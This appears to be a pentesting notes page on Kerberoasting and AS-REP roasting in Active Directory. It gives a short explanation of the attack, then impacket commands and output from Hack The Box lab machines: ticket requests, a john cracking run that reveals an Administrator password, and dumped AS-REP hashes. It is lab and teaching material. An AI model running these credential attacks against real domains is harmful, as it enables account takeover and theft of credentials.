Kerberosting

Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.

When you want to authenticate to some service using Kerberos, you contact the DC and tell it to which system service you want to authenticate. It encrypts a response to you with the service user’s password hash. You send that response to the service, which can decrypt it with it’s password, check who you are, and decide it if wants to let you in.

In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you will use off-line brute force to crack the password associated with the service.

Most of the time you will need an active account on the domain in order to initial Kerberoast, but if the DC is configured with UserAccountControl setting “Do not require Kerberos preauthentication” enabled, it is possible to request and receive a ticket to crack without a valid account on the domain.

Now let's get the SPNs. The script identified a user, Administrator:

┌──(kali㉿kali)-[~/Desktop]
└─$ locate GetUserSPNs.py                                                                             
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-07-21 02:36:10.518169             



[-] CCache file is not found. Skipping...

So, we have a ticket. Now, lets crack it with john.

┌──(kali㉿kali)-[~/Desktop]
└─$ john -w=/usr/share/wordlists/rockyou.txt GetUserSPNs.out 
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:11 DONE (2023-07-22 10:07) 0.08673g/s 913917p/s 913917c/s 913917C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We can directly run it without providing username and we get the hash.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/                     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-07-28 12:45:03.309423  2023-07-28 12:44:55.272027  0x410200 



[email protected]:caf2f3add954f9ac9f9b3e7a3d391bc4$db3f3fbc72a599266f8fa30d31498245fe3d01211185557a282f2d40e544ff92fddd7fb472a89bf67eee3556c662e4df672e24d4a2a03c1ab3eee44ed74cba22473993f8284916b09a768cb68beee16973cf493fab978d6befaee38f69418f23dc477cb37f8d28655eb4c0dc6a61ce9e9a520f6a423571540c379c06c0abcb29ce7b7a6b884f155e7548a67023d362fdd3028695cc3f7ffc45af8f97eac9f4ed3a6c85579151db03a78ff4970d252e9029fd5d4bca6513dd8ab2934cc2ad7369a489997b7c7ad288fa00454f47bc803e5f465b429d3e301069d700d468a2ebe291ccf36025b4

If we have potential usernames, we can also use that wordlist to fetch hash value.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt  htb.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:301c9624aa2bd72f0676f909bb8ed6d7$f8930992b43a7465445dc7580a9698908b172b1b53cb2f101f3fcd67a40f3bb2f52ab4e73f97521f338c59d483dfe889ca8a2f98fd23956bd2a4ecf37bf401b64b27838a094cbb8ceb266d1acb6b469f7b6c6cff984daa9d12ea949db6a55041e9956b8d969cc1ea5c2e7518a6e5aaaecd24e4337a5cae197e5e156d0010689f7b3dac8873053c000a0a30de30223274338b8dee02d4673dee6c81670e8a2377fda9baa3caf32d54f3d51ca3ea14cceeeb99fda5da1829535888da9d8e61d79e030137a2e995202ea4ecc9e4f3c215054f2e303037b51f2e5e0a1b07e0a26a1682316a0b1ded
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User l0v3 doesn't have UF_DONT_REQUIRE_PREAUTH set
PreviousAD EnumerationNextAD Shell

Last updated